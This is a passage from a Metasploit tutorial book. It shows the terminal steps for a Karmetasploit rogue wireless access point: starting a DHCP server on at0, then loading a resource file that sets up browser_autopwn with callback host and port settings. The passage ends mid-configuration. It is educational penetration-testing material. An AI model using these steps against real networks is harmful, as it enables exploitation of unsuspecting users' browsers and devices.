180
Chapter 12
Next, we turn on the
at0
interface and start the DHCP server:
root@bt:/opt/metasploit3/msf3#
ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
root@bt:/opt/metasploit3/msf3#
dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
. . . SNIP . . .
Wrote 0 leases to leases file.
Listening on LPF/at0/00:21:29:e2:de:14/10.0.0/24
Sending on LPF/at0/00:21:29:e2:de:14/10.0.0/24
Sending on Socket/fallback/fallback-net
Can't create PID file /var/run/dhcpd.pid: Permission denied.
root@bt:/opt/metasploit3/msf3#
ps aux |grep dhcpd
dhcpd 4015 0.0 0.2 3812 1840 ? Ss 14:09 0:00 dhcpd3 -cf /etc/dhcp3/
dhcpd.conf at0
root 4017 0.0 0.0 2012 564 pts/4 S+ 14:09 0:00 grep dhcpd
root@bt:/opt/metasploit3/msf3# tail
tail -f /var/log/messages
Apr 2 14:06:57 bt kernel: device mon0 entered promiscuous mode
Apr 2 14:09:30 bt dhcpd: Internet Systems Consortium DHCP Server V3.1.1
Apr 2 14:09:30 bt kernel: warning: `dhcpd3' uses 32-bit capabilities (legacy support in use)
Apr 2 14:09:30 bt dhcpd: Copyright 2004-2008 Internet Systems Consortium.
Apr 2 14:09:30 bt dhcpd: All rights reserved.
Apr 2 14:09:30 bt dhcpd: For info, please visit http://www.isc.org/sw/dhcp/
Apr 2 14:09:30 bt dhcpd: Wrote 0 leases to leases file.
Apr 2 14:09:30 bt dhcpd: Listening on LPF/at0/00:21:29:e2:de:14/10.0.0/24
Apr 2 14:09:30 bt dhcpd: Sending on LPF/at0/00:21:29:e2:de:14/10.0.0/24
The
at0
interface is turned on using the IP address of
10.0.0.1
shown at ,
and the DHCP server is started using the configuration file we created earlier,
also using
at0
as shown at . To make sure that the DHCP server is running,
we run a quick
ps aux
at . Finally, we tail the
messages
log file at to see when
IP addresses are being handed out.
Now that the entire Karmetasploit configuration is complete, we can
load the resource file from within
msfconsole
using
resource karma.rc
as shown
next. (Note that we can also pass the resource file to
msfconsole
via the com-
mand line by entering
msfconsole -r karma.rc
.) Let’s see it in action:
msf >
resource karma.rc
resource (karma.rc)>
db_connect postgres:toor@127.0.0.1/msfbook
resource (karma.rc)>
use auxiliary/server/browser_autopwn
resource (karma.rc)>
setg AUTOPWN_HOST 10.0.0.1
AUTOPWN_HOST => 10.0.0.1
resource (karma.rc)>
setg AUTOPWN_PORT 55550
AUTOPWN_PORT => 55550
resource (karma.rc)>
setg AUTOPWN_URI /ads
AUTOPWN_URI => /ads
resource (karma.rc)>
set LHOST 10.0.0.1
LHOST => 10.0.0.1
resource (karma.rc)>
set LPORT 45000
LPORT => 45000
resource (karma.rc)>
set SRVPORT 55550
SRVPORT => 55550
resource (karma.rc)>
set URIPATH /ads